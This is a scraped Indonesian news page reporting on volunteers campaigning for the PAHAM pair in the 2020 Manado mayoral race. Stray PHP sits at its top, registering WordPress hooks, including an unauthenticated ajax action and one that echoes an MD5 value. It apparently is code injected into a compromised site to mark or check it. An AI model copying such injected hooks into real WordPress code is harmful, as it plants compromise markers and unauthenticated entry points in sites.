function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Menang di 4 Survey Nasional, DRAiM: Target PAHAM Menang Telak – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 3 Nov 2020 11:33 WIB ·

Menang di 4 Survey Nasional, DRAiM: Target PAHAM Menang Telak


					Menang di 4 Survey Nasional, DRAiM: Target PAHAM Menang Telak Perbesar

 

MANADO – Relawan yang terbentuk mendukunG Pasangan calon Paula-Harley Manado (PAHAM) telah sepakat untuk mengawal kemenangan PAHAM 9 Desember dengan kemenangan telak.

Kendati sedikitnya ada 4 lembaga survey nasional memposisikan pasangan yang diusung Parpol NASDEM, PSI DAN PERINDO diposisi puncak dengan presentasi terpaut cukup jauh. Kendat ok demikian, relawan, pendukung dan simpatisan tampaknya belum cukup puas dengan hasil tersebut.

Tak heran, kantong-kantong suara yang sempat dipanen ketika pertarungan di Pilwako 2015 lalu kembali disisir dan dirangkul. Lihat saja, tidak mau kalah dengan manuver Tim Garuda One, Relawan Mangindaan (REMA) kembali turun masuk keluar lorong menarik simpatik masyarakat.

Senin (02/11/2020), REMA bersama rapatkan barisan menangkan PAHAM dengan merangkul warga di Kecamatan Sario tepatnya di Lorong Penca.
Suasana akrab penuh suasana kekeluargaan pun terlihat REMA dan warga Lorong Penca, terlebih calon Wakil Walikota Manado DR Harley “Ai” Mangindaan (DRAiM) dan Ketua PSI Manado Bro Stevi Mait ikut bergabung.

Sementara itu, ditegaskan Ai Mangindaan, dari hasil 4 lembaga survey nasional memang PAHAM masih tetap diatas.

“Tapi saya harapkan dengan hasil tersebut membuat seluruh tim relawan yang tergabung dalam PAHAM untuk terus tambah giat bekerja. Karena target PAHAM menang telak di 9 Desember 2020,” tegas optimis DRAiM didepan para REMA dan warga Lorong Penca.

“REMA akan terus mengawal kemenangan PAHAM dengan merapapatkan barisan. San menarik simpatik masyarakatr untuk bergabung dengan PAHAM. Tapi dengan caya yang santun,” sambung pentolan REMA Meiny Kristien Mapasa Warokka. (redaksi)

Artikel ini telah dibaca 0 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized